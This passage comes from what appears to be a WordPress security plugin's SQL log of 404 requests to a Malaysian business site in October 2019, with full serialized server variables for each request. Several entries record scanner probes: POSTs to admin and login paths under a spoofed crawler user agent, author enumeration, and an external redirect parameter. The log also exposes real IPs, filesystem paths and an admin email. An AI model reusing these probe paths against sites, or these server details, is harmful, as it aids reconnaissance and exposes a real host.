Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.93.214.130\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.93.214.130\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/admin/image/Sql.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/admin/image/Sql.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzRKHtjB8Y0WvpqtvIYwAAANQ\";s:12:\"REDIRECT_URL\";s:20:\"/admin/image/Sql.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51999\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/admin/image/Sql.asp\";s:10:\"SCRIPT_URL\";s:20:\"/admin/image/Sql.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzRKHtjB8Y0WvpqtvIYwAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926852.7114\";s:12:\"REQUEST_TIME\";s:10:\"1571926852\";}}','notice','2019-10-24 14:20:56','2019-10-24 14:20:53',35730504,37533264,'http://bintara.com.my//admin/image/Sql.asp',1,0,'203.93.214.130'),(28905,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"//%23/pages/ucenter/login\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.74.22.109\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.74.22.109\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/#/pages/ucenter/login\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/#/pages/ucenter/login\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzLqHtjB8Y0WvpqtvIXwAAAME\";s:12:\"REDIRECT_URL\";s:22:\"/#/pages/ucenter/login\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/#/pages/ucenter/login\";s:10:\"SCRIPT_URL\";s:22:\"/#/pages/ucenter/login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzLqHtjB8Y0WvpqtvIXwAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926830.2627\";s:12:\"REQUEST_TIME\";s:10:\"1571926830\";}}','notice','2019-10-24 14:20:32','2019-10-24 14:20:30',35269232,37075104,'http://bintara.com.my//%23/pages/ucenter/login',1,0,'222.74.22.109'),(28904,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"//%23/pages/ucenter/login\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"221.238.170.38\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"221.238.170.38\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/#/pages/ucenter/login\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/#/pages/ucenter/login\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzGkq-QPicCh3WFsYa4wAAAIk\";s:12:\"REDIRECT_URL\";s:22:\"/#/pages/ucenter/login\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/#/pages/ucenter/login\";s:10:\"SCRIPT_URL\";s:22:\"/#/pages/ucenter/login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzGkq-QPicCh3WFsYa4wAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926810.4962\";s:12:\"REQUEST_TIME\";s:10:\"1571926810\";}}','notice','2019-10-24 14:20:12','2019-10-24 14:20:10',35342592,37143456,'http://bintara.com.my//%23/pages/ucenter/login',1,0,'221.238.170.38'),(28903,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"//%23/pages/ucenter/login\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.240.115.104\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.240.115.104\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/#/pages/ucenter/login\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/#/pages/ucenter/login\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGzCUq-QPicCh3WFsYa0AAAAI0\";s:12:\"REDIRECT_URL\";s:22:\"/#/pages/ucenter/login\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50785\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/#/pages/ucenter/login\";s:10:\"SCRIPT_URL\";s:22:\"/#/pages/ucenter/login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbGzCUq-QPicCh3WFsYa0AAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571926793.6785\";s:12:\"REQUEST_TIME\";s:10:\"1571926793\";}}','notice','2019-10-24 14:19:57','2019-10-24 14:19:54',35777784,37579544,'http://bintara.com.my//%23/pages/ucenter/login',1,0,'61.240.115.104'),(28902,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3100.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58750\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbGjlu0MT698oQwhBK9UjgAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571922838.8769\";s:12:\"REQUEST_TIME\";s:10:\"1571922838\";}}','notice','2019-10-24 13:14:02','2019-10-24 13:13:59',35313176,37116528,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28901,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"56606\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbGiT92Cd74l7secq5liYQAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571922511.5162\";s:12:\"REQUEST_TIME\";s:10:\"1571922511\";}}','notice','2019-10-24 13:08:34','2019-10-24 13:08:31',35319360,37130352,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'136.243.199.108'),(28900,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/hp-designjet-printers/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGTOqHtjB8Y0Wvpqtu74AAAAMc\";s:12:\"REDIRECT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.145\";s:11:\"REMOTE_PORT\";s:5:\"10212\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:10:\"SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbGTOqHtjB8Y0Wvpqtu74AAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571918650.1605\";s:12:\"REQUEST_TIME\";s:10:\"1571918650\";}}','notice','2019-10-24 12:04:12','2019-10-24 12:04:10',33804296,35606232,'https://bintara.com.my/hp-designjet-printers/',1,0,'207.46.13.145'),(28899,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:114:\"/?page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:112:\"page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.230.195.62\";s:11:\"REMOTE_PORT\";s:5:\"55778\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbGLM92Cd74l7secq5lP3AAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571916595.6996\";s:12:\"REQUEST_TIME\";s:10:\"1571916595\";}}','notice','2019-10-24 11:30:05','2019-10-24 11:29:56',35313280,37107608,'https://bintara.com.my/?page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'5.230.195.62'),(28130,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.11.68 (KHTML, like Gecko) Chrome/53.6.0969.5697 Safari/534.50\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XabtblVwATuNyQjXQnoanAAAAVM\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:13:\"36.84.100.165\";s:11:\"REMOTE_PORT\";s:5:\"34840\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XabtblVwATuNyQjXQnoanAAAAVM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571220846.9455\";s:12:\"REQUEST_TIME\";s:10:\"1571220846\";}}','notice','2019-10-16 10:14:09','2019-10-16 10:14:07',35419888,37218384,'https://bintara.com.my/author/admin/',1,0,'36.84.100.165'),(28131,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 